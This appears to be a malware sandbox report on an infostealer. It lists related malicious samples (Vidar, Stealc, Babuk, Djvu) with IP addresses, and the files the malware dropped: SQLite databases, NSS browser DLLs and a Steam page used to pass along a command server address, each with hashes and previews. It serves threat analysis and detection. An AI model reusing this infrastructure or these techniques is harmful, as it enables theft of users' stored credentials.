51c64c77e60f3980eea90869b68c58a8	lzShU2RYJa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.246.168
	n8XBpFdVFU.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	95.217.246.168
	R5391762lf.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	95.217.246.168
	file.exe	Get hash	malicious	Vidar	Browse	95.217.246.168
	sIQywRNC5M.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.246.168
	qJKiVKZdFk.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	95.217.246.168
	Z4CYGTBlj7.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.246.168
	SUwX12D2S6.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.246.168
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	95.217.246.168
	rq0mVjR9ar.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.246.168
37f463bf4616ecd445d4a1937da06e19	BundleSweetIMSetup.exe	Get hash	malicious	Unknown	Browse	23.194.234.100
	DHL_ES567436735845755676678877988975877.vbs	Get hash	malicious	FormBook, GuLoader, Remcos	Browse	23.194.234.100
	Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe	Get hash	malicious	GuLoader, Remcos	Browse	23.194.234.100
	ad.msi	Get hash	malicious	Latrodectus	Browse	23.194.234.100
	Document_a19_79b555791-28h97348k5477-3219g9.js	Get hash	malicious	Latrodectus	Browse	23.194.234.100
	360total.dll.dll	Get hash	malicious	Latrodectus	Browse	23.194.234.100
	ad.msi	Get hash	malicious	Latrodectus	Browse	23.194.234.100
	SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.32374.20351.xlsx	Get hash	malicious	Unknown	Browse	23.194.234.100
	SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe	Get hash	malicious	FormBook, GuLoader	Browse	23.194.234.100
	ProconGO1121082800.LnK.lnk	Get hash	malicious	Unknown	Browse	23.194.234.100

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\HDGCFHIDAKEC\mozglue.dll	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	3R18jv6iGv.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	YEnIrzZUUw.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	bUcIhJ4VHm.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	w3WOJ1ohgD.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
C:\ProgramData\HDGCFHIDAKEC\freebl3.dll	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	3R18jv6iGv.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	YEnIrzZUUw.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	bUcIhJ4VHm.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	w3WOJ1ohgD.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse

Created / dropped Files

C:\ProgramData\BAAEHDBF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BFIDGHDB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBFIEHDHIIIECAAKECFHIECBKJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECBAEBGH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECGDBAEH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GDHDAEBGCAAFIDGCGDHI

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HDGCFHIDAKEC\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: QPoX60yhZt.exe, Detection: malicious, Browse Filename: 3R18jv6iGv.exe, Detection: malicious, Browse Filename: YEnIrzZUUw.exe, Detection: malicious, Browse Filename: bUcIhJ4VHm.exe, Detection: malicious, Browse Filename: w3WOJ1ohgD.exe, Detection: malicious, Browse Filename: R0hb7jyBcv.exe, Detection: malicious, Browse Filename: g77dRQ1Csm.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: mJVVW85CnW.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HDGCFHIDAKEC\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: QPoX60yhZt.exe, Detection: malicious, Browse Filename: 3R18jv6iGv.exe, Detection: malicious, Browse Filename: YEnIrzZUUw.exe, Detection: malicious, Browse Filename: bUcIhJ4VHm.exe, Detection: malicious, Browse Filename: w3WOJ1ohgD.exe, Detection: malicious, Browse Filename: R0hb7jyBcv.exe, Detection: malicious, Browse Filename: g77dRQ1Csm.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: mJVVW85CnW.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HDGCFHIDAKEC\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\HDGCFHIDAKEC\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HDGCFHIDAKEC\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HDGCFHIDAKEC\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JDGIECGIEBKJJJJKEGHJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199677575543[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (2969), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	33805
Entropy (8bit):	5.435975835246442
Encrypted:	false
SSDEEP:	768:ndpqm+0Iz3YAA9CWG4AWfcDAgZ4VWBCW3KI8iCfJkPVoEAd2Z4VWBCW3KI8iKh2u:nd8m+0Iz3YAA9CWGpWFgZ4VWBCW3KI8H
MD5:	4CA9A8FDBC6B14D09E1C9331DF9C00CE
SHA1:	B4A9A3C011C7381820EF3EF4F7014EA946F53E9B
SHA-256:	45634A80BAACEDE0938B9665B305A3A054E959FAEBE305E2E80652E43B06315A
SHA-512:	B2345BA7C7950032791367C44DD6ABDC15337E0B0EFDBDC00ADF33240DF546E4A2E00453880FCBE55B7A2A40B44BD193011EC330944EF24FC7785A21D15EE456
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: nve7n2 https://95.217.246.168\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2459136
Entropy (8bit):	6.052474106868353
Encrypted:	false
SSDEEP:	49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
MD5:	90E744829865D57082A7F452EDC90DE5
SHA1:	833B178775F39675FA4E55EAB1032353514E1052
SHA-256:	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
SHA-512:	0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4\|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
